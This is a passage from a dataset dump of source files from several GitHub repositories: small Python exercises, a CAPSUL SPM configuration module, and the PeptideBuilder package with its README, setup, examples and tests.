old_index_upper_e = eng_upper_alphabet.find(j)\n new_index_upper_e = old_index_upper_e + step\n new_proposal += eng_upper_alphabet[new_index_upper_e]\n elif j == j.lower():\n old_index_lower_e = eng_lower_alphabet.find(j)\n new_index_lower_e = old_index_lower_e + step\n new_proposal += eng_lower_alphabet[new_index_lower_e]\n new_list.append(new_proposal)\nprint(' '.join(new_list))" }, { "alpha_fraction": 0.5629322528839111, "alphanum_fraction": 0.5753803849220276, "avg_line_length": 18.567567825317383, "blob_id": "c5a6dd7fe892be7b72dc336f38dc8e3473a119fd", "content_id": "82c2e335bd542a8794932dabd7a0c5e84dc4ec15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 859, "license_type": "no_license", "max_line_length": 151, "num_lines": 37, "path": "/next_prime.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\n\nНапишите функцию get_next_prime(num), которая принимает в качестве аргумента натуральное число num и возвращает первое простое число большее числа num.\n\n\"\"\"\n\n\ndef is_prime(num):\n counter = 0\n for i in range(1, num + 1):\n if num % i == 0:\n counter += 1\n if counter == 1:\n return False\n if counter > 2:\n return False\n else:\n return True\n\n\ndef get_next_prime(num):\n while is_prime(num) is True:\n num += 1\n if is_prime(num) is True:\n break\n while is_prime(num) is False:\n num += 1\n if is_prime(num) is True:\n break\n return num\n\n\n# считываем данные\nn = int(input())\n\n# вызываем функцию\nprint(get_next_prime(n))" }, { "alpha_fraction": 0.6541582345962524, "alphanum_fraction": 0.6541582345962524, "avg_line_length": 28.909090042114258, "blob_id": "6f161dd8084acf559718c5efd7003f38828cdd9d", "content_id": "9cf0d130ae25f57b29d373464b12a7bb101ccec6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1375, "license_type": "no_license", "max_line_length": 149, "num_lines": 33, "path": "/splitting_into_chunks.py", "repo_name": "EvgeniiyaR/tasks", "src_encoding": "UTF-8", "text": "\"\"\"\n\nНа вход программе подаются две строки, на одной символы, на другой число nn. Из первой строки формируется список.\n\nРеализуйте функцию chunked(), которая принимает на вход список и число, задающее размер чанка (куска), а возвращает список из чанков указанной длины.\n\nФормат входных данных:\nНа вход программе подается строка текста, содержащая символы, отделенные символом пробела и число nn на отдельной строке.\n\nФормат выходных данных:\nПрограмма должна вывести указанный вложенный список.\n\n\"\"\"\n\na = input().split(' ')\nb = int(input())\nnew_list = []\nother_list = []\nfor x in a:\n if not other_list:\n other_list.append(x)\n if len(other_list) == b:\n new_list.append(other_list)\n other_list = []\n else:\n if len(other_list) != b:\n other_list.append(x)\n if len(other_list) == b:\n new_list.append(other_list)\n other_list = []\nif other_list:\n new_list.append(other_list)\nprint(new_list)" } ]
13
ylep/capsul
https://github.com/ylep/capsul
b4c06a53a3c0d3133faf846c599e55fdbd4210df
32ccf3867ef9385fb49210fbc611b1fab4f36fa3
bd06fb82c529097155d55e3975f4fc49b8e909dc
refs/heads/master
2019-01-01T14:26:47.316312
2017-12-01T14:41:42
2017-12-01T14:41:42
31,950,435
0
0
null
2015-03-10T10:04:55
2015-03-04T14:36:09
2015-03-04T14:36:08
null
[ { "alpha_fraction": 0.5461695194244385, "alphanum_fraction": 0.5507796406745911, "avg_line_length": 36.41624450683594, "blob_id": "cec6f6d76cfdc1ecb5222eeac6de61a7bc05800b", "content_id": "026fa866c59f345bf091df8220af1c4d6e711cf4", "detected_licenses": [ "LicenseRef-scancode-cecill-b-en" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7375, "license_type": "permissive", "max_line_length": 79, "num_lines": 197, "path": "/capsul/study_config/config_modules/spm_config.py", "repo_name": "ylep/capsul", "src_encoding": "UTF-8", "text": "##########################################################################\n# CAPSUL - Copyright (C) CEA, 2013\n# Distributed under the terms of the CeCILL-B license, as published by\n# the CEA-CNRS-INRIA. Refer to the LICENSE file or to\n# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html\n# for details.\n##########################################################################\n\n# System import\nimport os\nimport logging\ntry:\n import subprocess32 as subprocess\nexcept ImportError:\n import subprocess\n\n# TRAITS import\nfrom traits.api import Directory, File, Bool, Enum, Undefined, Str\n\n# CAPSUL import\nfrom capsul.study_config.study_config import StudyConfigModule\n\n# Define the logger\nlogger = logging.getLogger(__name__)\n\ndef find_spm(matlab=None, matlab_path=None):\n \"\"\" Function to return the root directory of SPM.\n\n Parameters\n ----------\n matlab: str (default=None)\n if given, is the path to the MATLAB executable.\n matlab_path: str (default None)\n if given, is a MATLAB expression fed to addpath.\n\n Returns\n -------\n last_line: str\n the SPM root directory\n \"\"\"\n # Script to execute with matlab in order to find SPM root dir\n script = (\"spm8;\"\n \"fprintf(1, '%s', spm('dir'));\"\n \"exit();\")\n\n # Add matlab path if necessary\n if matlab_path:\n script = \"addpath({0});\".format(matlab_path) + script\n\n # Generate the matlab command\n command = [matlab or \"matlab\",\n \"-nodisplay\", \"-nosplash\", \"-nojvm\",\n \"-r\", script]\n\n # Try to execute the command\n try:\n process = subprocess.Popen(command, stdout=subprocess.PIPE)\n except OSError:\n # Matlab is not present\n raise Exception(\"Could not find SPM.\")\n stdout = process.communicate()[0]\n last_line = stdout.split(\"\\n\")[-1]\n\n # Do not consider weird data at the end of the line\n if '\\x1b' in last_line:\n last_line = last_line[:last_line.index('\\x1b')]\n\n # If the last line is empty, SPM not found\n if last_line == \"\":\n raise Exception(\"Could not find SPM.\")\n\n # Debug message\n logger.debug(\"SPM found at location '{0}'.\".format(last_line))\n\n return last_line\n\n\nclass SPMConfig(StudyConfigModule):\n \"\"\" SPM configuration.\n\n There is two ways to configure SPM:\n * the first one requires to configure matlab and then to set the spm\n directory.\n * the second one is based on a standalone version of spm and requires\n to set the spm executable directory.\n \"\"\"\n\n dependencies = [\"MatlabConfig\"]\n\n def __init__(self, study_config, configuration):\n \"\"\" Initialize the SPMConfig class.\n \"\"\"\n super(SPMConfig, self).__init__(study_config, configuration)\n self.study_config.add_trait(\"spm_standalone\", Bool(\n False,\n desc=\"If True, use the standalone version of SPM.\"))\n self.study_config.add_trait(\"spm_directory\", Directory(\n Undefined,\n output=False,\n desc=\"Directory containing SPM.\"))\n self.study_config.add_trait(\"spm_exec\", File(\n Undefined,\n output=False,\n desc=\"SPM standalone (MCR) command path.\"))\n self.study_config.add_trait(\"use_spm\", Bool(\n Undefined,\n desc=\"If True, SPM configuration is set up on startup.\"))\n self.study_config.add_trait('spm_version', Str(\n Undefined, output=False,\n desc='Version string for SPM: \"12\", \"8\", etc.'))\n\n def initialize_module(self):\n \"\"\" Set up SPM environment according to current configuration.\n \"\"\"\n if self.study_config.use_spm is False:\n # Configuration is explicitely asking not to use SPM\n return\n elif self.study_config.use_spm is True:\n # If use_spm is True configuration must be valid otherwise\n # an EnvironmentError is raised\n force_configuration = True\n else:\n # If use_spm is not defined, SPM configuration will\n # be done if possible but there will be no error if it cannot be\n # done.\n force_configuration = False\n self.study_config.use_spm = True\n\n # If we need to check spm configuration\n if self.study_config.use_spm is True:\n\n # If standalone\n if self.study_config.spm_standalone is True:\n\n # Check that a valid file has been set for the stanalone\n # version of spm\n if (self.study_config.spm_exec is Undefined or \n not os.path.isfile(self.study_config.spm_exec)):\n self.study_config.use_spm = False\n if force_configuration:\n raise EnvironmentError(\"'spm_exec' must be defined in \"\n \"order to use SPM-standalone.\")\n else:\n return\n\n # determine SPM version (currently 8 or 12)\n if os.path.isdir(os.path.join(\n self.study_config.spm_directory, 'spm12_mcr')):\n self.study_config.spm_version = '12'\n elif os.path.isdir(os.path.join(\n self.study_config.spm_directory, 'spm8_mcr')):\n self.study_config.spm_version = '8'\n else:\n self.study_config.spm_version = Undefined\n\n # If not standalone\n else:\n\n # Check that Matlab is activated\n if not self.study_config.use_matlab:\n self.study_config.use_spm = False\n if force_configuration:\n raise EnvironmentError(\n \"Matlab is disabled. Cannot use SPM via Matlab.\")\n else:\n return\n\n # If the spm sources are not set, try to find them automaticaly\n if self.study_config.spm_directory is Undefined:\n self.study_config.spm_directory = find_spm(\n self.study_config.matlab_exec)\n\n # Check that a valid directory has been set for spm sources\n if not os.path.isdir(self.study_config.spm_directory):\n self.study_config.use_spm = False\n if force_configuration:\n raise EnvironmentError(\n \"'{0}' is not a valid SPM directory.\".format(\n self.study_config.spm_directory))\n else:\n return\n\n # determine SPM version (currently 8 or 12)\n if os.path.isdir(os.path.join(\n self.study_config.spm_directory, 'toolbox', 'OldNorm')):\n self.study_config.spm_version = '12'\n elif os.path.isdir(os.path.join(\n self.study_config.spm_directory, 'templates')):\n self.study_config.spm_version = '8'\n else:\n self.study_config.spm_version = Undefined\n\n def initialize_callbacks(self):\n \"\"\" When the 'use_spm' trait changes, configure spm with the new\n setting.\n \"\"\"\n self.study_config.on_trait_change(self.initialize_module, \"use_spm\")\n \n" } ]
1
Lun4m/PeptideBuilder
https://github.com/Lun4m/PeptideBuilder
673e6e7fd177004a5c2dd97c2c76170b6481a5bb
b056f8958dbd8a820df717e39e29c933ffa6899a
918426a9daeaa23492e65f795620259f8317b959
refs/heads/master
2023-04-01T14:59:47.366433
2021-04-06T12:50:30
2021-04-06T12:50:30
300,332,562
2
0
MIT
2020-10-01T15:41:52
2020-08-24T13:44:21
2020-04-05T21:27:43
null
[ { "alpha_fraction": 0.6957446932792664, "alphanum_fraction": 0.7319148778915405, "avg_line_length": 18.625, "blob_id": "3714d018ffae4dbede474460b0185d4f9e6d915c", "content_id": "8a8d46938d2dcd990b8c62290f21f0ad1cbe799f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 470, "license_type": "permissive", "max_line_length": 112, "num_lines": 24, "path": "/NEWS.md", "repo_name": "Lun4m/PeptideBuilder", "src_encoding": "UTF-8", "text": "# Changelog\n\n## PeptideBuilder 1.1.0\n\n- It is now possible to add the terminal oxygen in a peptide via the newly added function `add_terminal_OXT()`. \n- Support for Python 2.7 has been dropped.\n- Proper unit tests have been added.\n- The code has undergone extensive clean-up, thanks to Sean Aubin.\n\n## PeptideBuilder 1.0.3\n\nMinor bug fixes.\n\n## PeptideBuilder 1.0.2\n\nPython 3 support.\n\n## PeptideBuilder 1.0.1\n\nMinor bug fixes.\n\n## PeptideBuilder 1.0\n\nFirst initial release." }, { "alpha_fraction": 0.6365384459495544, "alphanum_fraction": 0.6403846144676208, "avg_line_length": 29, "blob_id": "e6cd9fdf12ea60353f679d6e7266e37fd6cdb461", "content_id": "94fcd4ffc8f691d41b45d3aa31d8ecd0df889b66", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1560, "license_type": "permissive", "max_line_length": 73, "num_lines": 52, "path": "/setup.py", "repo_name": "Lun4m/PeptideBuilder", "src_encoding": "UTF-8", "text": "from setuptools import setup\n\n\nINSTALL_REQUIRES = [\"Biopython\"]\n\nTEST_REQUIRES = [\n # testing and coverage\n \"pytest\",\n \"coverage\",\n \"pytest-cov\",\n # to be able to run `python setup.py checkdocs`\n \"collective.checkdocs\",\n \"pygments\",\n]\n\n\nwith open(\"README.md\", \"r\") as f:\n long_description = f.read()\n\nwith open(\"PeptideBuilder/__init__.py\", \"r\") as f:\n init = f.readlines()\n\nfor line in init:\n if \"__version__\" in line:\n __version__ = line.split('\"')[-2]\n\nsetup(\n name=\"PeptideBuilder\",\n version=__version__,\n author=\"Matthew Z. Tien\",\n author_email=\"[email protected]\",\n description=\"Create peptide PDB files with specified geometry\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/clauswilke/PeptideBuilder\",\n download_url=\"https://github.com/clauswilke/PeptideBuilder/releases\",\n platforms=\"Tested on Mac OS X and Windows 10\",\n packages=[\"PeptideBuilder\"],\n install_requires=INSTALL_REQUIRES,\n extras_require={\"test\": TEST_REQUIRES + INSTALL_REQUIRES,},\n classifiers=[\n # Trove classifiers\n # (https://pypi.python.org/pypi?%3Aaction=list_classifiers)\n \"Development Status :: 5 - Production/Stable\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Scientific/Engineering :: Bio-Informatics\",\n \"Topic :: Scientific/Engineering :: Chemistry\",\n \"Intended Audience :: Science/Research\",\n ],\n)\n" }, { "alpha_fraction": 0.7594882845878601, "alphanum_fraction": 0.7663112878799438, "avg_line_length": 44.98039245605469, "blob_id": "ef8368efd3d82ac3ea89b03ed581c7ac241144b0", "content_id": "b33bc2e0431e5478346a1d74739422a7ce96dce9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2345, "license_type": "permissive", "max_line_length": 382, "num_lines": 51, "path": "/README.md", "repo_name": "Lun4m/PeptideBuilder", "src_encoding": "UTF-8", "text": "# PeptideBuilder: A simple Python library to generate model peptides.\n\n*Matthew Z. Tien, Dariya K. Sydykova, Austin G. Meyer, and Claus O. Wilke*\n\n[![PyPI version](https://badge.fury.io/py/PeptideBuilder.svg)](https://badge.fury.io/py/PeptideBuilder)\n![PyPI - Downloads](https://img.shields.io/pypi/dm/PeptideBuilder)\n![PyPI - License](https://img.shields.io/pypi/l/PeptideBuilder)\n[![Build Status](https://travis-ci.org/clauswilke/PeptideBuilder.svg?branch=master)](https://travis-ci.org/clauswilke/PeptideBuilder)\n[![Coverage Status](https://img.shields.io/codecov/c/github/clauswilke/PeptideBuilder/master.svg)](https://codecov.io/github/clauswilke/PeptideBuilder?branch=master)\n\n## Installation\n\nYou can install PeptideBuilder with pip:\n```\npip install PeptideBuilder\n```\nPeptideBuilder has one required dependency: [Biopython](https://pypi.org/project/biopython/)\n\n\n## Examples\n\nFor example usage, we encourage you to checkout the scripts in the `examples` folder and in the `tests` folder. The `examples` folder contains two scripts showing typical usage. The script `simpleExample.py` is a brief example script demonstrating basic use of the PeptideBuilder library. The script `evaluation.py` reproduces the results presented in Table 1 of Tien et al. (2013).\n\nThe file `test_PeptideBuilder.py` in `tests` contains extensive tests for the various functions provided by this library and may also be useful if you're looking for example usage.\n\n## Misc\n\nThe software is provided to you under the MIT license (see file `LICENSE.txt`).\nThe most up-to-date version of this software is available at\nhttps://github.com/clauswilke/PeptideBuilder.\n\nTo test whether your installation works properly, run `pytest` in the top-level project folder.\n\n## Contributing\n\nPull requests are welcome on GitHub. However, to be accepted, contributions must:\n1. Be styled with [`black`](https://black.readthedocs.io/en/stable/)\n2. Be linted with `pylint`\n3. Be type-checked with `mypy`\n4. Pass the `pytest` unit tests\n\nThus, before contributing code make sure the following commands exit without errors when run from the root directory of the Peptide Builder project:\n\n- `pytest`\n- `black .`\n- `mypy PeptideBuilder/`\n- `pylint --rcfile=setup.cfg PeptideBuilder/`\n\n**Reference:**\nM. Z. Tien, D. K. Sydykova, A. G. Meyer, C. O. Wilke (2013). PeptideBuilder:\nA simple Python library to generate model peptides. PeerJ 1:e80.\n" }, { "alpha_fraction": 0.7652173638343811, "alphanum_fraction": 0.7753623127937317, "avg_line_length": 26.600000381469727, "blob_id": "a4fe91ae703c23db3e9cb06001f2a92ab656cd53", "content_id": "460dacfd614e9ee3a7ee30a84d90d45d2de6f1fa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 690, "license_type": "permissive", "max_line_length": 74, "num_lines": 25, "path": "/examples/simpleExample.py", "repo_name": "Lun4m/PeptideBuilder", "src_encoding": "UTF-8", "text": "\"\"\"\nSimple example script demonstrating how to use the PeptideBuilder library.\n\nThe script generates a peptide consisting of six arginines in alpha-helix\nconformation, and it stores the peptide under the name \"example.pdb\".\n\"\"\"\n\nfrom PeptideBuilder import Geometry\nimport PeptideBuilder\n\n# create a peptide consisting of 6 glycines\ngeo = Geometry.geometry(\"G\")\ngeo.phi = -60\ngeo.psi_im1 = -40\nstructure = PeptideBuilder.initialize_res(geo)\nfor i in range(5):\n PeptideBuilder.add_residue(structure, geo)\n# add terminal oxygen (OXT) to the final glycine\nPeptideBuilder.add_terminal_OXT(structure)\n\nimport Bio.PDB\n\nout = Bio.PDB.PDBIO()\nout.set_structure(structure)\nout.save(\"example.pdb\")\n" }, { "alpha_fraction": 0.6985507011413574, "alphanum_fraction": 0.7072463631629944, "avg_line_length": 30.363636016845703, "blob_id": "41bb7ecb53e5f691a9523bda21eaea3019a979db", "content_id": "9ff9c13da5fcac98dd22a3647d8fd9209a24a76c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 345, "license_type": "permissive", "max_line_length": 103, "num_lines": 11, "path": "/PeptideBuilder/__init__.py", "repo_name": "Lun4m/PeptideBuilder", "src_encoding": "UTF-8", "text": "\"\"\"``PeptideBuilder`` package for creating peptide models in PDB format based on geometrical parameters\nWritten by Matthew Z. Tien, Dariya K. Sydykova, Austin G. Meyer, and Claus O. Wilke.\nPython modules\n----------------\nThe package consists of the following Python modules:\n* PeptideBuilder\n* Geometry\n\"\"\"\n__version__ = \"1.1.0\"\nfrom .PeptideBuilder import *\nfrom .Geometry import *\n" }, { "alpha_fraction": 0.5058394074440002, "alphanum_fraction": 0.5260036587715149, "avg_line_length": 28.945354461669922, "blob_id": "6c1b6290e6600c4c33708db8cbb6ecca2077488d", "content_id": "9a3df431d10080f3bac7b5d2a503e9e2f19fd070", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10960, "license_type": "permissive", "max_line_length": 188, "num_lines": 366, "path": "/examples/evaluation.py", "repo_name": "Lun4m/PeptideBuilder", "src_encoding": "UTF-8", "text": "from pathlib import Path\nimport math\n\nfrom Bio.PDB import PDBIO\nfrom Bio.PDB import PDBParser\nfrom Bio.PDB import Superimposer\nfrom Bio.PDB.vectors import calc_angle, calc_dihedral\n\nfrom PeptideBuilder import Geometry\nimport PeptideBuilder\n\n\nresdict = {\n \"ALA\": \"A\",\n \"CYS\": \"C\",\n \"ASP\": \"D\",\n \"GLU\": \"E\",\n \"PHE\": \"F\",\n \"GLY\": \"G\",\n \"HIS\": \"H\",\n \"ILE\": \"I\",\n \"LYS\": \"K\",\n \"LEU\": \"L\",\n \"MET\": \"M\",\n \"ASN\": \"N\",\n \"PRO\": \"P\",\n \"GLN\": \"Q\",\n \"ARG\": \"R\",\n \"SER\": \"S\",\n \"THR\": \"T\",\n \"VAL\": \"V\",\n \"TRP\": \"W\",\n \"TYR\": \"Y\",\n}\n\nPDBdir = \"PDBs\"\n\n\ndef build_linear_model(pdb_filename):\n parser = PDBParser()\n structure = parser.get_structure(\"sample\", Path(PDBdir, pdb_filename))\n model = structure[0]\n chain = model[\"A\"]\n model_structure_geo = []\n for res in chain:\n if res.get_resname() in resdict.keys():\n tempgeo = Geometry.geometry(resdict[res.get_resname()])\n model_structure_geo.append(tempgeo)\n model_structure = PeptideBuilder.initialize_res(model_structure_geo[0])\n for i in range(1, len(model_structure_geo)):\n model_structure = PeptideBuilder.add_residue(\n model_structure, model_structure_geo[i]\n )\n\n return model_structure\n\n\ndef make_pdb_file(struct, file_nom):\n outfile = PDBIO()\n outfile.set_structure(struct)\n outfile.save(Path(PDBdir, file_nom))\n return file_nom\n\n\ndef build_backbone_model(pdb_filename):\n parser = PDBParser()\n structure = parser.get_structure(\"sample\", Path(PDBdir, pdb_filename))\n model = structure[0]\n chain = model[\"A\"]\n model_structure_geo = []\n prev = \"0\"\n N_prev = \"0\"\n CA_prev = \"0\"\n CO_prev = \"0\"\n ##O_prev=\"0\"\n prev_res = \"\"\n rad = 180.0 / math.pi\n for res in chain:\n if res.get_resname() in resdict.keys():\n geo = Geometry.geometry(resdict[res.get_resname()])\n if prev == \"0\":\n N_prev = res[\"N\"]\n CA_prev = res[\"CA\"]\n C_prev = res[\"C\"]\n ##O_prev=res['O']\n prev = \"1\"\n else:\n n1 = N_prev.get_vector()\n ca1 = CA_prev.get_vector()\n c1 = C_prev.get_vector()\n ##o1=O_prev.get_vector()\n\n ##O_curr=res['O']\n C_curr = res[\"C\"]\n N_curr = res[\"N\"]\n CA_curr = res[\"CA\"]\n\n ##o=O_curr.get_vector()\n c = C_curr.get_vector()\n n = N_curr.get_vector()\n ca = CA_curr.get_vector()\n\n geo.CA_C_N_angle = calc_angle(ca1, c1, n) * rad\n geo.C_N_CA_angle = calc_angle(c1, n, ca) * rad\n geo.CA_N_length = CA_curr - N_curr\n geo.CA_C_length = CA_curr - C_curr\n geo.peptide_bond = N_curr - C_prev\n\n psi = calc_dihedral(n1, ca1, c1, n) ##goes to current res\n omega = calc_dihedral(ca1, c1, n, ca) ##goes to current res\n phi = calc_dihedral(c1, n, ca, c) ##goes to current res\n\n geo.psi_im1 = psi * rad\n geo.omega = omega * rad\n geo.phi = phi * rad\n\n geo.CA_N_length = CA_curr - N_curr\n geo.CA_C_length = CA_curr - C_curr\n ##geo.C_O_length= C_curr - O_curr\n\n geo.N_CA_C_angle = calc_angle(n, ca, c) * rad\n ##geo.CA_C_O_angle= calc_angle(ca, c, o)*rad\n\n ##geo.N_CA_C_O= calc_dihedral(n, ca, c, o)*rad\n\n N_prev = res[\"N\"]\n CA_prev = res[\"CA\"]\n C_prev = res[\"C\"]\n ##O_prev=res['O']\n\n model_structure_geo.append(geo)\n return model_structure_geo\n\n\ndef build_all_angles_model(pdb_filename):\n parser = PDBParser()\n structure = parser.get_structure(\"sample\", Path(PDBdir, pdb_filename))\n model = structure[0]\n chain = model[\"A\"]\n model_structure_geo = []\n prev = \"0\"\n N_prev = \"0\"\n CA_prev = \"0\"\n CO_prev = \"0\"\n prev_res = \"\"\n rad = 180.0 / math.pi\n for res in chain:\n if res.get_resname() in resdict.keys():\n geo = Geometry.geometry(resdict[res.get_resname()])\n if prev == \"0\":\n N_prev = res[\"N\"]\n CA_prev = res[\"CA\"]\n C_prev = res[\"C\"]\n prev = \"1\"\n else:\n n1 = N_prev.get_vector()\n ca1 = CA_prev.get_vector()\n c1 = C_prev.get_vector()\n\n C_curr = res[\"C\"]\n N_curr = res[\"N\"]\n CA_curr = res[\"CA\"]\n\n c = C_curr.get_vector()\n n = N_curr.get_vector()\n ca = CA_curr.get_vector()\n\n geo.CA_C_N_angle = calc_angle(ca1, c1, n) * rad\n geo.C_N_CA_angle = calc_angle(c1, n, ca) * rad\n\n psi = calc_dihedral(n1, ca1, c1, n) ##goes to current res\n omega = calc_dihedral(ca1, c1, n, ca) ##goes to current res\n phi = calc_dihedral(c1, n, ca, c) ##goes to current res\n\n geo.psi_im1 = psi * rad\n geo.omega = omega * rad\n geo.phi = phi * rad\n\n geo.N_CA_C_angle = calc_angle(n, ca, c) * rad\n ##geo.CA_C_O_angle= calc_angle(ca, c, o)*rad\n\n ##geo.N_CA_C_O= calc_dihedral(n, ca, c, o)*rad\n\n N_prev = res[\"N\"]\n CA_prev = res[\"CA\"]\n C_prev = res[\"C\"]\n ##O_prev=res['O']\n\n model_structure_geo.append(geo)\n return model_structure_geo\n\n\ndef build_phi_psi_model(pdb_filename):\n parser = PDBParser()\n structure = parser.get_structure(\"sample\", Path(PDBdir, pdb_filename))\n model = structure[0]\n chain = model[\"A\"]\n seq = \"\"\n phi_diangle = []\n psi_diangle = []\n omega_diangle = []\n for res in chain:\n if res.get_resname() in resdict.keys():\n\n seq += resdict[res.get_resname()]\n if len(seq) == 1:\n N_prev = res[\"N\"]\n CA_prev = res[\"CA\"]\n C_prev = res[\"C\"]\n else:\n n1 = N_prev.get_vector()\n ca1 = CA_prev.get_vector()\n c1 = C_prev.get_vector()\n\n C_curr = res[\"C\"]\n N_curr = res[\"N\"]\n CA_curr = res[\"CA\"]\n\n c = C_curr.get_vector()\n n = N_curr.get_vector()\n ca = CA_curr.get_vector()\n\n psi = calc_dihedral(n1, ca1, c1, n) ##goes to current res\n omega = calc_dihedral(ca1, c1, n, ca)\n phi = calc_dihedral(c1, n, ca, c) ##goes to current res\n\n phi_diangle.append(phi * 180.0 / math.pi)\n psi_diangle.append(psi * 180.0 / math.pi)\n omega_diangle.append(omega * 180.0 / math.pi)\n\n N_prev = res[\"N\"]\n CA_prev = res[\"CA\"]\n C_prev = res[\"C\"]\n\n model_structure_omega = PeptideBuilder.make_structure(\n seq, phi_diangle, psi_diangle, omega_diangle\n )\n model_structure_phi_psi = PeptideBuilder.make_structure(\n seq, phi_diangle, psi_diangle\n )\n return model_structure_omega, model_structure_phi_psi\n\n\ndef compare_structure(reference, alternate):\n parser = PDBParser()\n\n ref_struct = parser.get_structure(\"Reference\", Path(PDBdir, reference))\n alt_struct = parser.get_structure(\"Alternate\", Path(PDBdir, alternate))\n\n ref_model = ref_struct[0]\n ref_chain = ref_model[\"A\"]\n\n alt_model = alt_struct[0]\n alt_chain = alt_model[\"A\"]\n\n ref_atoms = []\n alt_atoms = []\n\n for ref_res in ref_chain:\n if ref_res.get_resname() in resdict.keys():\n ref_atoms.append(ref_res[\"CA\"])\n\n for alt_res in alt_chain:\n if alt_res.get_resname() in resdict.keys():\n alt_atoms.append(alt_res[\"CA\"])\n\n super_imposer = Superimposer()\n super_imposer.set_atoms(ref_atoms, alt_atoms)\n super_imposer.apply(alt_model.get_atoms())\n\n make_pdb_file(alt_struct, \"Aligned_\" + alternate)\n\n full = super_imposer.rms\n\n super_imposer_50 = Superimposer()\n super_imposer_50.set_atoms(ref_atoms[:50], alt_atoms[:50])\n super_imposer_50.apply(alt_model.get_atoms())\n\n make_pdb_file(alt_struct, \"Aligned_50_\" + alternate)\n\n f_50 = super_imposer_50.rms\n\n super_imposer_150 = Superimposer()\n super_imposer_150.set_atoms(ref_atoms[:150], alt_atoms[:150])\n super_imposer_150.apply(alt_model.get_atoms())\n\n make_pdb_file(alt_struct, \"Aligned_150_\" + alternate)\n\n f_150 = super_imposer_150.rms\n\n return f_50, f_150, full, len(ref_atoms)\n\n\ndef test_PeptideBuilder(pdb_code):\n # retrieve pdb file\n pdb_file = \"%s_clean.pdb\" % (pdb_code)\n\n # build backbone model from all angles and bond lengths\n structure_backbone = PeptideBuilder.make_structure_from_geos(\n build_backbone_model(pdb_file)\n )\n\n # build backbone model from all angles\n structure_all_angles = PeptideBuilder.make_structure_from_geos(\n build_all_angles_model(pdb_file)\n )\n\n # build models from dihedral angles only\n structure_omega, structure_phi_psi = build_phi_psi_model(pdb_file)\n\n # compare models to original structure\n RMS_backbone_50, RMS_backbone_150, RMS_backbone, size = compare_structure(\n pdb_file, make_pdb_file(structure_backbone, \"Backbone_\" + pdb_file)\n )\n RMS_phi_psi_50, RMS_phi_psi_150, RMS_phi_psi, size = compare_structure(\n pdb_file, make_pdb_file(structure_phi_psi, \"PhiPsi_\" + pdb_file)\n )\n RMS_omega_50, RMS_omega_150, RMS_omega, size = compare_structure(\n pdb_file, make_pdb_file(structure_omega, \"PhiPsiOmega_\" + pdb_file)\n )\n RMS_all_angles_50, RMS_all_angles_150, RMS_all_angles, size = compare_structure(\n pdb_file, make_pdb_file(structure_all_angles, \"AllAngles_\" + pdb_file)\n )\n output_line = (\n \"%s\\t%i\\t%0.1f\\t%0.1f\\t%0.1f\\t%0.1f\\t%0.1f\\t%0.1f\\t%0.1f\\t%0.1f\\t%0.1f\\t%0.1f\\t%0.1f\\t%0.1f\\n\"\n % (\n pdb_code,\n size,\n RMS_phi_psi_50,\n RMS_phi_psi_150,\n RMS_phi_psi,\n RMS_omega_50,\n RMS_omega_150,\n RMS_omega,\n RMS_all_angles_50,\n RMS_all_angles_150,\n RMS_all_angles,\n RMS_backbone_50,\n RMS_backbone_150,\n RMS_backbone,\n )\n )\n return output_line\n\n\ntest_structures = [\n \"1aq7\",\n \"1gfl\",\n \"1nbw\",\n \"1vca\",\n \"2o6r\",\n \"2r83\",\n \"3cap\",\n \"3cuq\",\n \"3vni\",\n \"7tim\",\n]\n\nf_out = open(\"reconstructed_RMSDs.txt\", \"w\")\nf_out.write(\n \"PDB-ID\\t\\tlengthPhi-Psi-50\\tPhi-Psi-150\\tPhi-Psi\\tPhi-Psi-Omega-50\\tPhi-Psi-Omega-150\\tPhi-Psi-Omega\\tAll-Angles-50\\tAll-Angles-150\\tAll-Angles\\tBackbone-50\\tBackbone-150\\tBackbone\\n\"\n)\nfor i in test_structures:\n print(i)\n f_out.write(test_PeptideBuilder(i))\nf_out.close()\n" }, { "alpha_fraction": 0.655634343624115, "alphanum_fraction": 0.6719858050346375, "avg_line_length": 29.95121955871582, "blob_id": "2368de5a95b208eb5464b2763d74bcbd87b4fbd5", "content_id": "c26bbfce1c26f4e32e5d508201158dbd5a5042fb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5076, "license_type": "permissive", "max_line_length": 86, "num_lines": 164, "path": "/tests/test_PeptideBuilder.py", "repo_name": "Lun4m/PeptideBuilder", "src_encoding": "UTF-8", "text": "from pathlib import Path\n\nfrom Bio.PDB.Polypeptide import PPBuilder\nfrom Bio.PDB import PDBParser\n\nimport PeptideBuilder\nfrom PeptideBuilder import Geometry\n\n\ndef compare_residues(r1, r2) -> bool:\n if not r1 == r2:\n return False\n if not len(list(r1.get_atoms())) == len(list(r2.get_atoms())):\n return False\n\n result = True\n for a1, a2 in zip(r1, r2):\n result = result and (abs(a1.coord - a2.coord) < 0.001).all()\n\n return result\n\n\ndef compare_to_reference(structure, ref_file) -> bool:\n parser = PDBParser()\n ref_structure = parser.get_structure(\"test\", str(Path(\"tests\", \"pdbs\", ref_file)))\n\n res = list(list(structure[0])[0])\n ref_res = list(list(ref_structure[0])[0])\n if not len(res) == len(ref_res):\n return False\n\n result = True\n for r1, r2 in zip(res, ref_res):\n result = result and compare_residues(r1, r2)\n\n return result\n\n\ndef test_add_residue():\n \"\"\"\n Build a peptide containing all 20 amino acids\n \"\"\"\n structure = 